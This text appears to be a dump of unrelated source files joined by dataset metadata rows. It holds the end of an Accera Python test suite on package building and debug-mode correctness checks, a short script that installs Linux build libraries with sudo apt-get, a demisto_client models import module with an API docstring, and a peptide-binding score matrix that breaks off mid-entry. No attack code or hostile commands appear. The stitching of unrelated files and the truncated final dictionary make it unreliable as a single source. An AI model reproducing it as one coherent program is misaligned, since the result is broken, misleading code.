sched: Schedule = nest.create_schedule()
sched.split(j, P4)
package = Package()
package_name = "test_parameterization_auxiliary_data"
parameter_grid = {
P0: [8, 16],
P1: [16, 32],
P2: [16],
P3: [1.0, 2.0],
P4: [3, 5, 7]
}
parameters = create_parameter_grid(parameter_grid)
package.add(sched, args=(A, B, C), base_name="matmul", parameters=parameters)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
hat_package = HATPackage(pathlib.Path(TEST_PACKAGE_DIR) / f"{package_name}.hat")
functions = [fn for fn in hat_package.get_functions()]
for function in functions:
data_point = function.auxiliary['accera']['parameters']
if data_point:
self.assertIn(int(data_point["P0"]), [8, 16])
self.assertIn(int(data_point["P1"]), [16, 32])
self.assertIn(int(data_point["P2"]), [16])
self.assertIn(float(data_point["P3"]), [1.0, 2.0])
self.assertIn(int(data_point["P4"]), [3, 5, 7])
class DSLTest_10Packages(unittest.TestCase):
def _create_plan(self, target=Target.HOST) -> Tuple:
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(64, ))
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
A[i] += 2.
plan = nest.create_plan(target)
return plan, A
def test_HAT_packages(self) -> None:
from accera import Target
pi3 = Target(Target.Model.RASPBERRY_PI_3B, category=Target.Category.CPU)
plan, A = self._create_plan(pi3)
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(
package_name,
format=Package.Format.HAT_STATIC,
mode=TEST_MODE,
output_dir=TEST_PACKAGE_DIR,
platform=Package.Platform.RASPBIAN
)
def test_MLIR_packages(self) -> None:
plan, A = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=Package.Format.MLIR_STATIC, output_dir=TEST_PACKAGE_DIR)
def test_default_output_dir(self) -> None:
plan, A = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE)
def test_debug_mode_1(self) -> None:
M = N = K = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, K))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
schedule.reorder(i, k, j, ii)
plan = schedule.create_plan()
plan.unroll(ii)
package = Package()
package_name = "MyDebugPackage"
function = package.add(plan, args=(A, B, C), base_name="func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, C_test + A_test @ B_test]
)
def test_debug_mode_2(self) -> None:
M = N = K = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, K))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
schedule.reorder(i, k, j, ii)
plan = schedule.create_plan()
plan.unroll(ii)
# deliberately introduce a correctness issue
plan.parallelize(indices=k)
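# (k is the reduction dimension; parallelizing it lets multiple threads
# update the same C[i, j] concurrently, as noted in the scheduling
# strategies test above)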
package = Package()
package_name = "MyDebugPackageIncorrect"
function = package.add(plan, args=(A, B, C), base_name="func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
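# check_correctness should flag the mismatch introduced above; print
# the failure rather than failing the test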
try:
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, C_test + A_test @ B_test]
)
except Exception as e:
print(e)
def test_debug_mode_fusion_1(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule = fuse(schedule0, schedule1, partial=1)
f, i, j0, j1 = schedule.get_indices()
ii = schedule.split(i, 2)
schedule.reorder(i, ii, f, j0, j1)
package = Package()
package_name = "MyFusionDebugPackage"
function = package.add(schedule, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, (C_test + A_test) * B_test]
)
def test_debug_mode_fusion_2(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Reorder schedule1 before fusing
schedule1.reorder(j1, i1)
# Fuse schedule0 with the reordered schedule1
schedule = fuse(schedule0, schedule1)
f, a, b = schedule.get_indices()
# Deliberately break logical equivalence
# before: C[1,0] = C[1,0] * B[1,0] + A[1,0]
# after: C[1,0] = (C[1,0] + A[1,0]) * B[1,0]
schedule.reorder(a, b, f)
package = Package()
package_name = "MyFusionDebugPackageIncorrect"
function = package.add(schedule, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
try:
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, (C_test + A_test) * B_test]
)
except Exception as e:
print(e)
def test_debug_mode_fusion_cascading_1(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule_f1 = fuse(schedule0, schedule1)
f, i, j = schedule_f1.get_indices()
schedule_f1.reorder(i, j, f)
nest2 = Nest(shape=(M, N))
i2, j2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2, j2] -= 1.0
schedule2 = nest2.create_schedule()
# set the fused schedule first in the fusing order
schedule_f2 = fuse(schedule_f1, schedule2, partial=2)
package = Package()
package_name = "MyFusionDebugPackageCascade1"
function = package.add(schedule_f2, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name,
before=[A_test, B_test, C_test],
after=[A_test, B_test, (C_test + A_test) * B_test - 1.0]
)
def test_debug_mode_fusion_cascading_2(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule_f1 = fuse(schedule0, schedule1)
f, i, j = schedule_f1.get_indices()
schedule_f1.reorder(i, j, f)
nest2 = Nest(shape=(M, N))
i2, j2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2, j2] -= 1.0
schedule2 = nest2.create_schedule()
# set an unfused schedule first in the fusing order
schedule_f2 = fuse(schedule2, schedule_f1, partial=2)
package = Package()
package_name = "MyFusionDebugPackageCascade2"
function = package.add(schedule_f2, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name,
before=[A_test, B_test, C_test],
after=[A_test, B_test, (C_test - 1.0 + A_test) * B_test]
)
def test_add_description(self) -> None:
from hatlib import HATFile
plan, A, = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
description1 = {
"Dependencies": ["numpy", "onnx", "scipy"],
"Documentation": "https://docs.readthedocs.io.",
"SHA": "0bb913ce84afa28127ea3fd2a9995e219dad322a"
}
package.add_description(
other=description1, version="1.0", author="Microsoft Research", license="https://mit-license.org"
)
description2 = {
"Documentation": "", # clearing a value
"SHA": None, # removing a value
"Release Notes": "https://stackoverflow.com" # adding an entry
}
package.add_description(other=description2)
package.add_description(version="2.0")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
hat_file = HATFile.Deserialize(pathlib.Path(TEST_PACKAGE_DIR) / f"{package_name}.hat")
hat_description = hat_file.description.auxiliary
self.assertEqual(hat_description["Dependencies"], description1["Dependencies"])
self.assertEqual(hat_description["Documentation"], description2["Documentation"])
self.assertNotIn("SHA", hat_description)
self.assertEqual(hat_description["Release Notes"], description2["Release Notes"])
self.assertEqual(hat_file.description.version, "2.0")
self.assertEqual(hat_file.description.author, "Microsoft Research")
self.assertEqual(hat_file.description.license_url, "https://mit-license.org")
if __name__ == '__main__':
unittest.main(verbosity=10)
| 36.217456 | 123 | 0.564138 | 16,033 | 121,582 | 4.094305 | 0.044284 | 0.044696 | 0.033666 | 0.044147 | 0.820517 | 0.787155 | 0.756855 | 0.727576 | 0.700399 | 0.670754 | 0 | 0.036953 | 0.30845 | 121,582 | 3,356 | 124 | 36.228248 | 0.74378 | 0.092366 | 0 | 0.606926 | 0 | 0 | 0.040735 | 0.021905 | 0 | 0 | 0 | 0.000298 | 0.043723 | 1 | 0.090909 | false | 0 | 0.021212 | 0 | 0.12381 | 0.003463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22cfce129d38264c057ac6a8e9c8ee161f050d70 | 196 | py | Python | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | 1 | 2015-12-08T18:00:38.000Z | 2015-12-08T18:00:38.000Z | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | null | null | null | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | null | null | null | import os
os.system("sudo apt-get install build-essential checkinstall libx11-dev libxext-dev zlib1g-dev libjpeg-dev libfreetype6-dev libxml2-dev")
os.system("sudo apt-get build-dep imagemagick") | 49 | 137 | 0.811224 | 31 | 196 | 5.129032 | 0.612903 | 0.100629 | 0.150943 | 0.188679 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027933 | 0.086735 | 196 | 4 | 138 | 49 | 0.860335 | 0 | 0 | 0 | 0 | 0.333333 | 0.80203 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
22d8e146781fc8a93785a980c90661e903fb7fe0 | 12,888 | py | Python | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | 1 | 2020-04-08T14:36:06.000Z | 2020-04-08T14:36:06.000Z | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | null | null | null | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# flake8: noqa
"""
Demisto API
This is the public REST API to integrate with the demisto server. HTTP requests can be sent using any HTTP client. For an example dedicated client, take a look at: https://github.com/demisto/demisto-py. Requests must include an API key that can be generated in the Demisto web client under 'Settings' -> 'Integrations' -> 'API keys'. Optimistic Locking and Versioning\\: When using the Demisto REST API, you will need to make sure to work on the latest version of the item (incident, entry, etc.), otherwise you will get a DB version error (which does not allow you to override a newer item). In addition, you can pass 'version\\: -1' to force a data override (be aware that other users' data might be lost). Assume that Alice and Bob both read the same data from the Demisto server, then they both changed the data, and then both tried to write the new versions back to the server. Whose changes should be saved? Alice’s? Bob’s? To solve this, each data item in Demisto has a numeric incremental version. If Alice saved an item with version 4 and Bob is trying to save the same item with version 3, Demisto will roll back Bob's request and return a DB version conflict error. Bob will need to get the latest item and work on it so Alice's work will not get lost. Example request using 'curl'\\: ``` curl 'https://hostname:443/incidents/search' -H 'content-type: application/json' -H 'accept: application/json' -H 'Authorization: <API Key goes here>' --data-binary '{\"filter\":{\"query\":\"-status:closed -category:job\",\"period\":{\"by\":\"day\",\"fromValue\":7}}}' --compressed ``` # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from demisto_client.demisto_api.models.advance_arg import AdvanceArg
from demisto_client.demisto_api.models.arg_atomic_filter import ArgAtomicFilter
from demisto_client.demisto_api.models.arg_filter import ArgFilter
from demisto_client.demisto_api.models.arg_transformer import ArgTransformer
from demisto_client.demisto_api.models.argument import Argument
from demisto_client.demisto_api.models.array_positions import ArrayPositions
from demisto_client.demisto_api.models.attachment import Attachment
from demisto_client.demisto_api.models.audit import Audit
from demisto_client.demisto_api.models.audit_result import AuditResult
from demisto_client.demisto_api.models.automation_script import AutomationScript
from demisto_client.demisto_api.models.automation_script_api import AutomationScriptAPI
from demisto_client.demisto_api.models.automation_script_filter import AutomationScriptFilter
from demisto_client.demisto_api.models.automation_script_filter_wrapper import AutomationScriptFilterWrapper
from demisto_client.demisto_api.models.automation_script_result import AutomationScriptResult
from demisto_client.demisto_api.models.complex_arg import ComplexArg
from demisto_client.demisto_api.models.create_incident_request import CreateIncidentRequest
from demisto_client.demisto_api.models.custom_fields import CustomFields
from demisto_client.demisto_api.models.d_bot_score import DBotScore
from demisto_client.demisto_api.models.dashboard import Dashboard
from demisto_client.demisto_api.models.data_collection_form import DataCollectionForm
from demisto_client.demisto_api.models.date_range import DateRange
from demisto_client.demisto_api.models.date_range_filter import DateRangeFilter
from demisto_client.demisto_api.models.delete_evidence import DeleteEvidence
from demisto_client.demisto_api.models.docker_image import DockerImage
from demisto_client.demisto_api.models.docker_images_result import DockerImagesResult
from demisto_client.demisto_api.models.download_entry import DownloadEntry
from demisto_client.demisto_api.models.duration import Duration
from demisto_client.demisto_api.models.ending_type import EndingType
from demisto_client.demisto_api.models.entry import Entry
from demisto_client.demisto_api.models.entry_category import EntryCategory
from demisto_client.demisto_api.models.entry_history import EntryHistory
from demisto_client.demisto_api.models.entry_reputation import EntryReputation
from demisto_client.demisto_api.models.entry_task import EntryTask
from demisto_client.demisto_api.models.entry_type import EntryType
from demisto_client.demisto_api.models.evidence import Evidence
from demisto_client.demisto_api.models.evidence_data import EvidenceData
from demisto_client.demisto_api.models.evidences import Evidences
from demisto_client.demisto_api.models.evidences_filter_wrapper import EvidencesFilterWrapper
from demisto_client.demisto_api.models.evidences_search_response import EvidencesSearchResponse
from demisto_client.demisto_api.models.field_group import FieldGroup
from demisto_client.demisto_api.models.field_mapping import FieldMapping
from demisto_client.demisto_api.models.field_term_location_map import FieldTermLocationMap
from demisto_client.demisto_api.models.file_metadata import FileMetadata
from demisto_client.demisto_api.models.filter_cache import FilterCache
from demisto_client.demisto_api.models.filter_operator_id import FilterOperatorID
from demisto_client.demisto_api.models.generic_indicator_update_batch import GenericIndicatorUpdateBatch
from demisto_client.demisto_api.models.generic_string_date_filter import GenericStringDateFilter
from demisto_client.demisto_api.models.generic_string_filter import GenericStringFilter
from demisto_client.demisto_api.models.grid_column import GridColumn
from demisto_client.demisto_api.models.group import Group
from demisto_client.demisto_api.models.groups import Groups
from demisto_client.demisto_api.models.human_cron import HumanCron
from demisto_client.demisto_api.models.important import Important
from demisto_client.demisto_api.models.incident import Incident
from demisto_client.demisto_api.models.incident_field import IncidentField
from demisto_client.demisto_api.models.incident_filter import IncidentFilter
from demisto_client.demisto_api.models.incident_search_response_wrapper import IncidentSearchResponseWrapper
from demisto_client.demisto_api.models.incident_status import IncidentStatus
from demisto_client.demisto_api.models.incident_type import IncidentType
from demisto_client.demisto_api.models.incident_wrapper import IncidentWrapper
from demisto_client.demisto_api.models.indicator_context import IndicatorContext
from demisto_client.demisto_api.models.indicator_filter import IndicatorFilter
from demisto_client.demisto_api.models.indicator_result import IndicatorResult
from demisto_client.demisto_api.models.inline_response200 import InlineResponse200
from demisto_client.demisto_api.models.insight_cache import InsightCache
from demisto_client.demisto_api.models.inv_playbook_assignee import InvPlaybookAssignee
from demisto_client.demisto_api.models.inv_playbook_due import InvPlaybookDue
from demisto_client.demisto_api.models.inv_playbook_task_complete_data import InvPlaybookTaskCompleteData
from demisto_client.demisto_api.models.inv_playbook_task_data import InvPlaybookTaskData
from demisto_client.demisto_api.models.inv_task_info import InvTaskInfo
from demisto_client.demisto_api.models.investigation import Investigation
from demisto_client.demisto_api.models.investigation_filter import InvestigationFilter
from demisto_client.demisto_api.models.investigation_playbook import InvestigationPlaybook
from demisto_client.demisto_api.models.investigation_playbook_data import InvestigationPlaybookData
from demisto_client.demisto_api.models.investigation_playbook_state import InvestigationPlaybookState
from demisto_client.demisto_api.models.investigation_playbook_task import InvestigationPlaybookTask
from demisto_client.demisto_api.models.investigation_playbook_tasks_api import InvestigationPlaybookTasksAPI
from demisto_client.demisto_api.models.investigation_search_response import InvestigationSearchResponse
from demisto_client.demisto_api.models.investigation_status import InvestigationStatus
from demisto_client.demisto_api.models.investigation_type import InvestigationType
from demisto_client.demisto_api.models.investigations import Investigations
from demisto_client.demisto_api.models.ioc_object import IocObject
from demisto_client.demisto_api.models.ioc_objects import IocObjects
from demisto_client.demisto_api.models.label import Label
from demisto_client.demisto_api.models.location import Location
from demisto_client.demisto_api.models.locations import Locations
from demisto_client.demisto_api.models.module_args import ModuleArgs
from demisto_client.demisto_api.models.new_docker_image import NewDockerImage
from demisto_client.demisto_api.models.new_docker_image_result import NewDockerImageResult
from demisto_client.demisto_api.models.notifiable_item import NotifiableItem
from demisto_client.demisto_api.models.notify_timings import NotifyTimings
from demisto_client.demisto_api.models.operator_argument import OperatorArgument
from demisto_client.demisto_api.models.order import Order
from demisto_client.demisto_api.models.output import Output
from demisto_client.demisto_api.models.output_type import OutputType
from demisto_client.demisto_api.models.period import Period
from demisto_client.demisto_api.models.playbook_input import PlaybookInput
from demisto_client.demisto_api.models.playbook_inputs import PlaybookInputs
from demisto_client.demisto_api.models.playbook_output import PlaybookOutput
from demisto_client.demisto_api.models.playbook_outputs import PlaybookOutputs
from demisto_client.demisto_api.models.playbook_view import PlaybookView
from demisto_client.demisto_api.models.question import Question
from demisto_client.demisto_api.models.raw_message import RawMessage
from demisto_client.demisto_api.models.remote_repos import RemoteRepos
from demisto_client.demisto_api.models.report import Report
from demisto_client.demisto_api.models.report_automation import ReportAutomation
from demisto_client.demisto_api.models.report_fields_decoder import ReportFieldsDecoder
from demisto_client.demisto_api.models.report_query import ReportQuery
from demisto_client.demisto_api.models.reputation_calc_alg import ReputationCalcAlg
from demisto_client.demisto_api.models.reputation_data import ReputationData
from demisto_client.demisto_api.models.run_status import RunStatus
from demisto_client.demisto_api.models.sla import SLA
from demisto_client.demisto_api.models.sla_state import SLAState
from demisto_client.demisto_api.models.script_sub_type import ScriptSubType
from demisto_client.demisto_api.models.script_target import ScriptTarget
from demisto_client.demisto_api.models.script_type import ScriptType
from demisto_client.demisto_api.models.search_incidents_data import SearchIncidentsData
from demisto_client.demisto_api.models.section import Section
from demisto_client.demisto_api.models.section_item import SectionItem
from demisto_client.demisto_api.models.severity import Severity
from demisto_client.demisto_api.models.stats_query_response import StatsQueryResponse
from demisto_client.demisto_api.models.stats_text_response import StatsTextResponse
from demisto_client.demisto_api.models.stats_trends_response import StatsTrendsResponse
from demisto_client.demisto_api.models.system import System
from demisto_client.demisto_api.models.system_agent import SystemAgent
from demisto_client.demisto_api.models.task import Task
from demisto_client.demisto_api.models.task_condition import TaskCondition
from demisto_client.demisto_api.models.task_loop import TaskLoop
from demisto_client.demisto_api.models.task_state import TaskState
from demisto_client.demisto_api.models.task_type import TaskType
from demisto_client.demisto_api.models.task_view import TaskView
from demisto_client.demisto_api.models.term_location_map import TermLocationMap
from demisto_client.demisto_api.models.terminal_options import TerminalOptions
from demisto_client.demisto_api.models.timer_action import TimerAction
from demisto_client.demisto_api.models.timer_trigger import TimerTrigger
from demisto_client.demisto_api.models.transformer_operator_id import TransformerOperatorID
from demisto_client.demisto_api.models.update_data_batch import UpdateDataBatch
from demisto_client.demisto_api.models.update_entry import UpdateEntry
from demisto_client.demisto_api.models.update_entry_tags import UpdateEntryTags
from demisto_client.demisto_api.models.update_indicator_reputation_data import UpdateIndicatorReputationData
from demisto_client.demisto_api.models.update_response import UpdateResponse
from demisto_client.demisto_api.models.uploaded_entry import UploadedEntry
from demisto_client.demisto_api.models.widget import Widget
from demisto_client.demisto_api.models.widget_cell import WidgetCell
from demisto_client.demisto_api.models.widget_cells import WidgetCells
| 79.067485 | 1,584 | 0.883923 | 1,772 | 12,888 | 6.166479 | 0.226298 | 0.133614 | 0.225588 | 0.318477 | 0.517434 | 0.517434 | 0.390592 | 0.097831 | 0.027455 | 0 | 0 | 0.00175 | 0.068746 | 12,888 | 162 | 1,585 | 79.555556 | 0.908682 | 0.134389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fe12b8a969844f7c2cc5981dca7b7c586822615e | 2,045 | py | Python | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | A_02_03_8 = {0: {'A': 0.181, 'C': 0.005, 'E': 0.051, 'D': 0.112, 'G': 0.134, 'F': -0.47, 'I': -0.441, 'H': 0.022, 'K': 0.028, 'M': -0.38, 'L': -0.366, 'N': -0.011, 'Q': 0.211, 'P': 0.518, 'S': 0.119, 'R': 0.296, 'T': 0.213, 'W': -0.106, 'V': -0.045, 'Y': -0.07}, 1: {'A': 0.133, 'C': 0.06, 'E': 0.057, 'D': 0.23, 'G': 0.056, 'F': -0.128, 'I': -0.347, 'H': 0.306, 'K': 0.075, 'M': -0.823, 'L': -0.984, 'N': -0.041, 'Q': -0.162, 'P': 0.471, 'S': 0.378, 'R': 0.359, 'T': 0.349, 'W': 0.015, 'V': -0.001, 'Y': -0.004}, 2: {'A': -0.312, 'C': -0.043, 'E': 0.105, 'D': 0.058, 'G': -0.275, 'F': -0.093, 'I': -0.098, 'H': 0.094, 'K': -0.063, 'M': -0.105, 'L': -0.041, 'N': 0.087, 'Q': 0.23, 'P': 0.174, 'S': 0.014, 'R': 0.119, 'T': 0.082, 'W': 0.11, 'V': 0.017, 'Y': -0.059}, 3: {'A': 0.006, 'C': 0.001, 'E': -0.001, 'D': -0.001, 'G': -0.004, 'F': -0.006, 'I': -0.011, 'H': 0.007, 'K': 0.012, 'M': -0.004, 'L': -0.011, 'N': 0.001, 'Q': -0.002, 'P': -0.009, 'S': 0.006, 'R': 0.012, 'T': 0.002, 'W': 0.0, 'V': -0.005, 'Y': 0.008}, 4: {'A': -0.12, 'C': -0.012, 'E': 0.042, 'D': 0.061, 'G': 0.066, 'F': -0.076, 'I': -0.267, 'H': 0.121, 'K': 0.058, 'M': -0.06, 'L': -0.114, 'N': 0.129, 'Q': 0.109, 'P': 0.029, 'S': 0.099, 'R': 0.065, 'T': 0.015, 'W': 0.006, 'V': -0.189, 'Y': 0.04}, 5: {'A': -0.059, 'C': -0.011, 'E': 0.01, 'D': 0.026, 'G': 0.008, 'F': -0.064, 'I': -0.103, 'H': 0.069, 'K': 0.015, 'M': -0.026, 'L': -0.057, 'N': 0.067, 'Q': 0.069, 'P': -0.027, 'S': 0.07, 'R': 0.049, 'T': 0.039, 'W': -0.003, 'V': -0.056, 'Y': -0.017}, 6: {'A': -0.109, 'C': -0.022, 'E': 0.013, 'D': 0.006, 'G': -0.031, 'F': 0.047, 'I': 0.011, 'H': 0.071, 'K': 0.158, 'M': 0.072, 'L': 0.06, 'N': -0.009, 'Q': 0.051, 'P': -0.184, 'S': -0.089, 'R': 0.133, 'T': -0.14, 'W': -0.015, 'V': -0.086, 'Y': 0.064}, 7: {'A': -0.062, 'C': 0.213, 'E': 0.072, 'D': 0.054, 'G': 